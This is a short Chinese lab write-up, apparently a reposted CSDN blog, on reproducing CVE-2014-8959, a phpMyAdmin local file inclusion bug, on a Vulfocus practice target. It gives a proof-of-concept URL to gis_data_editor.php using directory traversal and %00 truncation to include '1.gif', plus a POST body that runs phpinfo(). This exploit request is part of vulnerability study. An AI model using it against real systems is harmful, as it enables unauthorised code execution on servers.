【漏洞复现-phpmyadmin-文件包含】CVE-2014-8959

目录

一、靶场环境

1.1、平台:

1.2、知识:

1.3、描述:

二、漏洞验证

2.1、分析:

2.4、解题:


一、靶场环境

1.1、平台:

Vulfocus 漏洞威胁分析平台

123.58.224.8:51373

1.2、知识:

1、%00

截断

2、/../../

目录穿越

基础利用,但过于鸡肋

1.3、描述:

其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞

1.已知MySQL用户名和密码登录到phpmyadmin

2.需要截断漏洞配合才能任意包含

3、包含根目录下1.gif等恶意文件



二、漏洞验证

2.1、分析:

登陆页面

/pma/gis_data_editor.php

用户名密码登陆pmatest/pmatest (phpMyAdmin)

进入以后 

随便点一个,拦截到token


 POC:

http://ip:port/pma/gis_data_editor.php?token=4320dfa8b951d131f1a71891bbb2edbd&&gis_data[gis_type]=/../../../../1.gif%00

(使用自己拦截到的token)

post提交:

a=phpinfo();

2.4、解题:

猜你喜欢

转载自blog.csdn.net/qq_53079406/article/details/127310342
今日推荐